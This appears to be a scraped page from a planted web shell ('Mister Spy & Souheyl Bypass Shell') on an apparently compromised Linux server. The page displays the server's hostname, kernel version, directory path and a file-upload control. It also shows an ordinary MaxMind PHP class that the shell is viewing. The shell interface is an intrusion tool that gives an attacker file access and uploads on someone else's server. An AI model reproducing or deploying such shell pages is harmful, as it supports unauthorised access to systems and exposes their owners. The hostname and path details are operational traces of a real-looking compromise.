Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/html/strat/vendor/maxmind/web-service-common/src/WebService/Http/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/html/strat/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php

<?php

declare(strict_types=1);

namespace MaxMind\WebService\Http;

/**
 * Class RequestFactory.
 *
 * @internal
 */
class RequestFactory
{
    /**
     * Keep the cURL resource here, so that if there are multiple API requests
     * done the connection is kept alive, SSL resumption can be used
     * etcetera.
     */
    private ?\CurlHandle $ch = null;

    private function getCurlHandle(): \CurlHandle
    {
        if ($this->ch === null) {
            $ch = curl_init();
            if ($ch === false) {
                throw new \RuntimeException('Unable to initialize cURL handle');
            }
            $this->ch = $ch;
        }

        return $this->ch;
    }

    /**
     * @param array<string, mixed> $options
     */
    public function request(string $url, array $options): Request
    {
        $options['curlHandle'] = $this->getCurlHandle();

        // @phpstan-ignore argument.type (options array is built dynamically by Client)
        return new CurlRequest($url, $options);
    }
}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net